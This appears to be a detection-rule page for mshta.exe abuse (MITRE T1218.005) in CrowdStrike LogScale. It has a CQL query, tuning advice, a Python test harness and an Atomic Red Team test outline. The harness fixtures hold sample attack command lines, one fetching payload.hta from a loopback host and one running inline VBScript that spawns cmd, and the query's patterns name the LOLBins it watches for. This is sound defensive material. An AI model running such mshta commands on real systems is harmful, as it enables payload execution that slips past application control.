T1218.005 CrowdStrike LogScale · LogScale

Detect Mshta in CrowdStrike LogScale

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files, JScript or VBScript through a trusted, Microsoft-signed Windows utility. Mshta.exe executes Microsoft HTML Application (HTA) files outside the Internet Explorer browser security context, so browser security settings do not apply, and application control policies that allow the signed binary without inspecting its arguments are bypassed. HTA content can be loaded from a local path, from a remote URL (mshta http://server/payload.hta), or supplied inline as a script URI (mshta vbscript:...). The technique is used by a wide range of threat actors, among them FIN7, Lazarus Group, APT29, APT32, MuddyWater, Kimsuky, Sidewinder and Gamaredon, making mshta.exe one of the most commonly abused LOLBins for initial access and execution.

MITRE ATT&CK

Tactic: Defense Evasion
Technique: T1218 System Binary Proxy Execution
Sub-technique: T1218.005 Mshta
Canonical reference: https://attack.mitre.org/techniques/T1218/005/

LogScale Detection Query

CrowdStrike LogScale (LogScale)
cql
#event_simpleName=ProcessRollup2
| FileName = /(?i)^mshta\.exe$/ OR ParentBaseFileName = /(?i)^mshta\.exe$/
| RemoteURL := if(CommandLine = /(?i)https?:\/\//, then="true", else="false")
| InlineScript := if(CommandLine = /(?i)(vbscript:|javascript:)/, then="true", else="false")
| GetObject := if(CommandLine = /(?i)GetObject/, then="true", else="false")
| ShellInvoke := if(CommandLine = /(?i)(WScript\.Shell|Shell\.Application|CreateObject|ActiveXObject)/, then="true", else="false")
| OfficeParent := if(ParentBaseFileName = /(?i)^(winword|excel|outlook|powerpnt)\.exe$/, then="true", else="false")
| HTAPath := if(CommandLine = /(?i)(\\Temp\\|\\AppData\\|\\Downloads\\|\\Desktop\\|\\Public\\)/, then="true", else="false")
| SuspiciousChild := if(ParentBaseFileName = /(?i)^mshta\.exe$/ AND FileName = /(?i)^(cmd|powershell|wscript|cscript|certutil|bitsadmin|regsvr32|rundll32)\.exe$/, then="true", else="false")
| Suspicious := if(RemoteURL = "true" OR InlineScript = "true" OR GetObject = "true" OR ShellInvoke = "true" OR OfficeParent = "true" OR HTAPath = "true" OR SuspiciousChild = "true", then="true", else="false")
| Suspicious = "true" OR ParentBaseFileName = /(?i)^mshta\.exe$/
| select([timestamp, ComputerName, UserName, FileName, CommandLine, ParentBaseFileName, ParentCommandLine, RemoteURL, InlineScript, GetObject, ShellInvoke, OfficeParent, HTAPath, SuspiciousChild])
| sort(timestamp, order=desc, limit=500)

Severity: high · Confidence: high

CrowdStrike Falcon LogScale (CQL) query detecting T1218.005 mshta.exe abuse using Falcon sensor ProcessRollup2 events. The first pipe stage narrows the stream to process events where mshta.exe is either the process or its parent; each row is then scored across seven risk indicators (mirroring the Splunk SPL version of this rule) with if() assignments, and the final filter keeps rows where any indicator fires or where mshta.exe is the parent, so that every child of mshta.exe is surfaced even when the child's own command line looks benign. Note that the command-line indicators are evaluated against the row's own CommandLine: for a child-process row the inline VBScript or remote URL lives in ParentCommandLine, which is why those rows are retained by the parent check rather than by RemoteURL or InlineScript. Intended for Falcon Data Replicator data or a native Falcon LogScale (SIEM) repository.

Data Sources

  • CrowdStrike Falcon Sensor (ProcessRollup2 events)
  • Falcon Data Replicator
  • CrowdStrike Falcon LogScale

Required Tables

#event_simpleName=ProcessRollup2 (Falcon telemetry stream)

False Positives & Tuning

  • Falcon sensors deployed on systems running legacy HTA-based enterprise applications, particularly ERP or clinical systems where mshta.exe is part of a sanctioned application stack; build a suppression list keyed on ComputerName plus the sanctioned .hta path as it appears in CommandLine (the SHA256 on a ProcessRollup2 event is the hash of mshta.exe itself, not of the .hta file, so a file-hash allowlist does not help here)
  • Software distribution workflows where ConfigMgr or a third-party deployment tool stages and executes HTA-based installer UIs in user-writable paths; the HTAPath indicator will fire consistently, so correlate with Falcon's application inventory to identify managed installers and allowlist them by host and path
  • Authorised offensive security engagements using mshta.exe as a test payload; Falcon's Detection Graph should surface the associated IOAs regardless, but verify against the engagement schedule before escalating to IR
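To check the indicator logic and a host-plus-path suppression list before deploying them, the following Python re-implements the query above over a handful of constructed ProcessRollup2 events. This is an added example written for this page, not code from CrowdStrike or LogScale: the events, hostnames, paths and the ALLOWLIST entries are made-up fixtures in the flattened key/value shape Falcon Data Replicator emits, and the regexes are the query's own with LogScale's (?i) expressed as re.I.

```python
import re
from fnmatch import fnmatch

# Constructed ProcessRollup2 fixtures (hosts, users, paths, timestamps are
# made up). Each dict mirrors the fields the CQL query reads.
SAMPLE_EVENTS = [
    {"event_simpleName": "ProcessRollup2", "timestamp": "1700000000000",
     "ComputerName": "WS01", "UserName": "alice",
     "FileName": "mshta.exe", "ParentBaseFileName": "WINWORD.EXE",
     "CommandLine": "mshta http://127.0.0.1:8080/payload.hta",
     "ParentCommandLine": "WINWORD.EXE /n invoice.docm"},
    {"event_simpleName": "ProcessRollup2", "timestamp": "1700000001000",
     "ComputerName": "WS01", "UserName": "alice",
     "FileName": "cmd.exe", "ParentBaseFileName": "mshta.exe",
     "CommandLine": "cmd.exe /c whoami",
     "ParentCommandLine": 'mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""cmd /c whoami"":close")'},
    {"event_simpleName": "ProcessRollup2", "timestamp": "1700000002000",
     "ComputerName": "ERP-KIOSK-07", "UserName": "svc_erp",
     "FileName": "mshta.exe", "ParentBaseFileName": "explorer.exe",
     "CommandLine": "mshta.exe C:\\Program Files\\ERPClient\\launcher.hta",
     "ParentCommandLine": "explorer.exe"},
    {"event_simpleName": "ProcessRollup2", "timestamp": "1700000003000",
     "ComputerName": "WS03", "UserName": "SYSTEM",
     "FileName": "mshta.exe", "ParentBaseFileName": "CcmExec.exe",
     "CommandLine": "mshta.exe C:\\Users\\Public\\Installers\\setup.hta",
     "ParentCommandLine": "C:\\Windows\\CCM\\CcmExec.exe"},
    {"event_simpleName": "ProcessRollup2", "timestamp": "1700000004000",
     "ComputerName": "WS02", "UserName": "bob",
     "FileName": "notepad.exe", "ParentBaseFileName": "explorer.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentCommandLine": "explorer.exe"},
]

# Hypothetical suppression list from the tuning bullets: a hostname glob plus
# the sanctioned .hta path as it appears in CommandLine.
ALLOWLIST = [
    {"ComputerName": "WS03", "HTAPath": "C:\\Users\\Public\\Installers\\setup.hta"},
    {"ComputerName": "ERP-KIOSK-*", "HTAPath": "C:\\Program Files\\ERPClient\\launcher.hta"},
]

MSHTA = re.compile(r"^mshta\.exe$", re.I)
# Same patterns as the CQL; (?i) becomes re.I.
CMDLINE_INDICATORS = {
    "RemoteURL":    re.compile(r"https?://", re.I),
    "InlineScript": re.compile(r"(vbscript:|javascript:)", re.I),
    "GetObject":    re.compile(r"GetObject", re.I),
    "ShellInvoke":  re.compile(r"(WScript\.Shell|Shell\.Application|CreateObject|ActiveXObject)", re.I),
    "HTAPath":      re.compile(r"(\\Temp\\|\\AppData\\|\\Downloads\\|\\Desktop\\|\\Public\\)", re.I),
}
OFFICE_PARENT = re.compile(r"^(winword|excel|outlook|powerpnt)\.exe$", re.I)
LOLBIN_CHILD = re.compile(r"^(cmd|powershell|wscript|cscript|certutil|bitsadmin|regsvr32|rundll32)\.exe$", re.I)
INDICATOR_NAMES = (*CMDLINE_INDICATORS, "OfficeParent", "SuspiciousChild")


def score(event):
    """Evaluate the seven indicators for one event, like the if() assignments."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentBaseFileName", "")
    name = event.get("FileName", "")
    ind = {k: bool(rx.search(cmd)) for k, rx in CMDLINE_INDICATORS.items()}
    ind["OfficeParent"] = bool(OFFICE_PARENT.match(parent))
    ind["SuspiciousChild"] = bool(MSHTA.match(parent) and LOLBIN_CHILD.match(name))
    return ind


def allowlisted(event, allowlist):
    """True when a tuning entry matches both the host glob and the HTA path."""
    return any(
        fnmatch(event.get("ComputerName", ""), entry["ComputerName"])
        and entry["HTAPath"].lower() in event.get("CommandLine", "").lower()
        for entry in allowlist
    )


def detect(events, allowlist=()):
    """Apply the query's filters; return enriched hits, newest first, max 500."""
    hits = []
    for ev in events:
        if ev.get("event_simpleName") != "ProcessRollup2":
            continue
        name, parent = ev.get("FileName", ""), ev.get("ParentBaseFileName", "")
        if not (MSHTA.match(name) or MSHTA.match(parent)):
            continue  # first pipe stage: mshta.exe as process or parent
        ind = score(ev)
        suspicious = any(ind.values())
        if not (suspicious or MSHTA.match(parent)):
            continue  # final filter: any indicator, or any child of mshta.exe
        if allowlisted(ev, allowlist):
            continue  # tuning: sanctioned host + .hta path
        hits.append({**ev, **ind, "Suspicious": suspicious})
    hits.sort(key=lambda h: int(h["timestamp"]), reverse=True)
    return hits[:500]


if __name__ == "__main__":
    for h in detect(SAMPLE_EVENTS, ALLOWLIST):
        fired = [k for k in INDICATOR_NAMES if h[k]]
        print(h["ComputerName"], h["FileName"], "<-", h["ParentBaseFileName"], fired)
```

Running it without the allowlist returns three rows (the ConfigMgr installer on WS03, the cmd.exe child, and the Office-spawned remote HTA); with ALLOWLIST the WS03 row is suppressed while the ERP kiosk never matched at all, because C:\Program Files is not in the HTAPath list. The cmd.exe row is instructive: every command-line indicator is false for it, since the vbscript: payload sits in ParentCommandLine, and it survives only through SuspiciousChild and the parent check. In LogScale the same suppression can be expressed with a lookup file consulted via match() against ComputerName and CommandLine.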

Testing Methodology

Validate this detection against three Atomic Red Team tests for T1218.005. Each test below lists the behaviour to exercise and the telemetry you should expect to see. The expected signals are written in Sysmon and Windows Security terms; in Falcon telemetry each Sysmon Event ID 1 or Security Event ID 4688 process creation corresponds to a ProcessRollup2 event, which is what the query above consumes. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Mshta Remote HTA Execution

    Expected signal: Sysmon Event ID 1: mshta.exe with URL in command line. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8080. Sysmon Event ID 22 (DNS Query) if a domain was used instead of IP. Security Event ID 4688.

  2. Test 2: Mshta Inline VBScript Execution

    Expected signal: Sysmon Event ID 1: mshta.exe with 'vbscript:' and 'CreateObject' in command line. Sysmon Event ID 1: cmd.exe as a child of mshta.exe. Sysmon Event ID 11: File created at temp path. Security Event ID 4688 for both processes.

  3. Test 3: Mshta Launched from Office Application Path

    Expected signal: Sysmon Event ID 1: cmd.exe, then mshta.exe with vbscript: and Execute in the command line. The InlineScript and GetObject/ShellInvoke indicators fire. If the obfuscated CreateObject resolves, WScript.Shell spawns calc.exe as a grandchild of mshta.exe.
